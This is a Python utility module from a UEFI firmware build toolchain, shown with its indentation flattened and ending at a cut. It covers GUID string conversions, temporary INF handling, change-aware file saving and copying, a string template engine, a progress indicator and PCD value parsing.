# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
#
# A temporary INF is copied to database path which must have write permission
# The temporary file will be removed at the end of the build
# In case of name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
# Modify the full path to temporary path, keep other unchanged
#
# To build the same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
RtPath.OriginalPath = Path
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1, open(TempFullPath, 'rb') as f2:
if f1.read() == f2.read():
return RtPath
_TempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporarily created INFs whose paths were saved in _TempInfs
#
def ClearDuplicatedInf():
while _TempInfs:
File = _TempInfs.pop()
if os.path.exists(File):
os.remove(File)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0, 3, 1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0, 12, 2):
Result = Result + ', 0x' + GuidList[4][Index:Index + 2]
Result += '}}'
return Result
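# Illustrative sketch (not part of the original source): given the registry-format
# GUID used in the examples above, the conversion produces a C structure initializer.
#
#   GuidStringToGuidStructureString("0D1B936F-68F3-4589-AFCC-FB8B7AEBC836")
#   # -> '{0x0D1B936F, 0x68F3, 0x4589, {0xAF, 0xCC, 0xFB, 0x8B, 0x7A, 0xEB, 0xC8, 0x36}}'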
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
if not GlobalData.gGuidCFormatPattern.match(GuidValue):
return ''
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
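# Illustrative sketch (not part of the original source): the reverse conversion,
# turning a C structure initializer back into registry format, assuming the
# GlobalData.gGuidCFormatPattern check accepts the input.
#
#   GuidStructureStringToGuidString(
#       "{0x0D1B936F, 0x68F3, 0x4589, {0xAF, 0xCC, 0xFB, 0x8B, 0x7A, 0xEB, 0xC8, 0x36}}")
#   # -> '0d1b936f-68f3-4589-afcc-fb8b7aebc836'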
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory is None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory is None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Store content in file
#
# This method is used to save a file only when its content has changed. This is
# quite useful for a "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True, FileLock=None):
# Convert to long file path format
File = LongFilePath(File)
if os.path.exists(File):
if IsBinaryFile:
try:
with open(File, "rb") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
else:
try:
with open(File, "r") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
OpenMode = "w"
if IsBinaryFile:
OpenMode = "wb"
# use default file_lock if no input new lock
if not FileLock:
FileLock = GlobalData.file_lock
if FileLock:
FileLock.acquire()
if GlobalData.gIsWindows and not os.path.exists(File):
# write temp file, then rename the temp file to the real file
# to make sure the file be immediate saved to disk
with tempfile.NamedTemporaryFile(OpenMode, dir=os.path.dirname(File), delete=False) as tf:
tf.write(Content)
tempname = tf.name
try:
os.rename(tempname, File)
except IOError as X:
if GlobalData.gBinCacheSource:
EdkLogger.quiet("[cache error]:fails to save file with error: %s" % (X))
else:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
finally:
if FileLock:
FileLock.release()
else:
try:
with open(File, OpenMode) as Fd:
Fd.write(Content)
except IOError as X:
if GlobalData.gBinCacheSource:
EdkLogger.quiet("[cache error]:fails to save file with error: %s" % (X))
else:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
finally:
if FileLock:
FileLock.release()
return True
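# Minimal usage sketch (an assumption, not part of the original module): write an
# autogen header only when its content actually changed, so "make" sees a new
# timestamp only on real changes. The path below is hypothetical.
#
#   Changed = SaveFileOnChange(r'Build/AutoGen.h', '#define FOO 1\n', IsBinaryFile=False)
#   # Changed is True on the first write or when the content differs, False otherwise.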
## Copy source file only if it is different from the destination file
#
# This method is used to copy a file only if the source and destination
# file contents are different. This is quite useful to avoid duplicated
# file writing.
#
# @param SrcFile The path of source file
# @param Dst The path of destination file or folder
#
# @retval True The two files content are different and the file is copied
# @retval False No copy really happen
#
def CopyFileOnChange(SrcFile, Dst, FileLock=None):
# Convert to long file path format
SrcFile = LongFilePath(SrcFile)
Dst = LongFilePath(Dst)
if not os.path.exists(SrcFile):
return False
if os.path.isdir(Dst):
DstFile = os.path.join(Dst, os.path.basename(SrcFile))
else:
DstFile = Dst
if os.path.exists(DstFile) and filecmp.cmp(SrcFile, DstFile, shallow=False):
return False
DirName = os.path.dirname(DstFile)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
# use default file_lock if no input new lock
if not FileLock:
FileLock = GlobalData.file_lock
if FileLock:
FileLock.acquire()
# os.replace and os.rename are the atomic operations in python 3 and 2.
# we use these two atomic operations to ensure the file copy is atomic:
# copy the src to a temp file in the dst same folder firstly, then
# replace or rename the temp file to the destination file.
with tempfile.NamedTemporaryFile(dir=DirName, delete=False) as tf:
CopyLong(SrcFile, tf.name)
tempname = tf.name
try:
if hasattr(os, 'replace'):
os.replace(tempname, DstFile)
else:
# os.rename requires removing the dst on Windows first, otherwise OSError will be raised.
if GlobalData.gIsWindows and os.path.exists(DstFile):
os.remove(DstFile)
os.rename(tempname, DstFile)
except IOError as X:
if GlobalData.gBinCacheSource:
EdkLogger.quiet("[cache error]:fails to copy file with error: %s" % (X))
else:
EdkLogger.error(None, FILE_COPY_FAILURE, ExtraData='IOError %s' % X)
finally:
if FileLock:
FileLock.release()
return True
## Retrieve and cache the real path name in the file system
#
# @param Root The root directory that paths are relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages to look up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
for P in PackageList:
GuidKeys = list(P.Guids.keys())
if Inffile and P._PrivateGuids:
if not Inffile.startswith(P.MetaFile.Dir):
GuidKeys = [x for x in P.Guids if x not in P._PrivateGuids]
if CName in GuidKeys:
return P.Guids[CName]
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like the following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder, Start, End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = []
self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return "".join(self.String)
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with a dictionary of placeholders and append it to the previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String.append( "".join(S.Instantiate(Dictionary) for S in SectionList))
else:
if isinstance(AppendString,list):
self.String.extend(AppendString)
else:
self.String.append(AppendString)
## Replace the string template with a dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join(S.Instantiate(Dictionary) for S in self._TemplateSectionList)
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
class Progressor:
# for avoiding a dead loop
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
# @param OpenMessage The string printed before progress characters
# @param CloseMessage The string printed after progress characters
# @param ProgressChar The character used to indicate the progress
# @param Interval The interval in seconds between two progress characters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag is None:
Progressor._StopFlag = threading.Event()
## Start to print progress character
#
# @param OpenMessage The string printed before progress characters
#
def Start(self, OpenMessage=None):
if OpenMessage is not None:
self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread is None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
Progressor._ProgressThread.setDaemon(False)
Progressor._ProgressThread.start()
## Stop printing progress character
#
# @param CloseMessage The string printed after progress characters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage is not None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
while not Progressor._StopFlag.isSet():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag is not None:
Progressor._StopFlag.set()
if Progressor._ProgressThread is not None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
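# Minimal usage sketch (an assumption, not part of the original source): print a
# dotted progress indicator around a long-running step.
#
#   Prog = Progressor("Processing meta-data", "done!")
#   Prog.Start()
#   # ... long-running work here ...
#   Prog.Stop()          # or Progressor.Abort() to stop without a closing message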
## Dictionary using prioritized list as key
#
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', TAB_STAR, 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey is None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value is None:
for Key in self.data:
Value = self.data[Key]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
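# Illustrative sketch (not part of the original source): a two-level tdict keyed
# by, say, (SkuId, Arch); 'COMMON' acts as a wildcard that matches any missing key.
#
#   d = tdict(True, 2)              # single-value mode, two key levels
#   d['COMMON', 'COMMON'] = 'default'
#   d['SKU1', 'IA32'] = 'override'
#   d['SKU1', 'IA32']               # -> 'override'
#   d['SKU2', 'X64']                # -> 'default' (falls back to the wildcard entry)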
def AnalyzePcdExpression(Setting):
RanStr = ''.join(sample(string.ascii_letters + string.digits, 8))
Setting = Setting.replace('\\\\', RanStr).strip()
# There might be escaped quote in a string: \", \\\" , \', \\\'
Data = Setting
# There might be '|' in string and in ( ... | ... ), replace it with '-'
NewStr = ''
InSingleQuoteStr = False
InDoubleQuoteStr = False
Pair = 0
for Index, ch in enumerate(Data):
if ch == '"' and not InSingleQuoteStr:
if Data[Index - 1] != '\\':
InDoubleQuoteStr = not InDoubleQuoteStr
elif ch == "'" and not InDoubleQuoteStr:
if Data[Index - 1] != '\\':
InSingleQuoteStr = not InSingleQuoteStr
elif ch == '(' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair += 1
elif ch == ')' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair -= 1
if (Pair > 0 or InSingleQuoteStr or InDoubleQuoteStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
for i, ch in enumerate(FieldList):
if RanStr in ch:
FieldList[i] = ch.replace(RanStr,'\\\\')
return FieldList
def ParseFieldValue (Value):
def ParseDevPathValue (Value):
if '\\' in Value:
Value = Value.replace('\\', '/').replace(' ', '')
Cmd = 'DevicePath ' + '"' + Value + '"'
try:
p = subprocess.Popen(Cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
except Exception as X:
raise BadExpression("DevicePath: %s" % (str(X)) )
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
if err:
raise BadExpression("DevicePath: %s" % str(err))
out = out.decode()
Size = len(out.split())
out = ','.join(out.split())
return '{' + out + '}', Size
if "{CODE(" in Value:
return Value, len(Value.split(","))
if isinstance(Value, type(0)):
return Value, (Value.bit_length() + 7) // 8
if not isinstance(Value, type('')):
raise BadExpression('Type %s is %s' %(Value, type(Value)))
Value = Value.strip()
if Value.startswith(TAB_UINT8) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 1:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 1
if Value.startswith(TAB_UINT16) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 2:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 2
if Value.startswith(TAB_UINT32) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 4:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 4
if Value.startswith(TAB_UINT64) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 8:
raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
return Value, 8
if Value.startswith(TAB_GUID) and Value.endswith(')'):
Value = Value.split('(', 1)[1][:-1].strip()
if Value[0] == '{' and Value[-1] == '}':
TmpValue = GuidStructureStringToGuidString(Value)
if not TmpValue:
raise BadExpression("Invalid GUID value string %s" % Value)
Value = TmpValue
if Value[0] == '"' and Value[-1] == '"':
Value = Value[1:-1]
try:
Value = str(uuid.UUID(Value).bytes_le)
if Value.startswith("b'"):
Value = Value[2:-1]
Value = "'" + Value + "'"
except ValueError as Message:
raise BadExpression(Message)
Value, Size = ParseFieldValue(Value)
return Value, 16
if Value.startswith('L"') and Value.endswith('"'):
# Unicode String
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, (len(List) + 1) * 2
if Value.startswith('"') and Value.endswith('"'):
# ASCII String
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List) + 1
if Value.startswith("L'") and Value.endswith("'"):
# Unicode Character Constant
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, len(List) * 2
if Value.startswith("'") and Value.endswith("'"):
# Character constant
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List)
if Value.startswith('{') and Value.endswith('}'):
# Byte array
Value = Value[1:-1]
List = [Item.strip() for Item in Value.split(',')]
List.reverse()
Value = 0
RetSize = 0
for Item in List:
ItemValue, Size = ParseFieldValue(Item)
RetSize += Size
for I in range(Size):
Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
return Value, RetSize
if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
Value = Value.replace("DEVICE_PATH(", '').rstrip(')')
Value = Value.strip().strip('"')
return ParseDevPathValue(Value)
if Value.lower().startswith('0x'):
try:
Value = int(Value, 16)
except:
raise BadExpression("invalid hex value: %s" % Value)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value[0].isdigit():
Value = int(Value, 10)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value.lower() == 'true':
return 1, 1
if Value.lower() == 'false':
return 0, 1
return Value, 1
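# Illustrative examples (not part of the original source), assuming TAB_UINT16 is
# the usual "UINT16" string: ParseFieldValue maps typed literals to a
# (value, size-in-bytes) pair.
#
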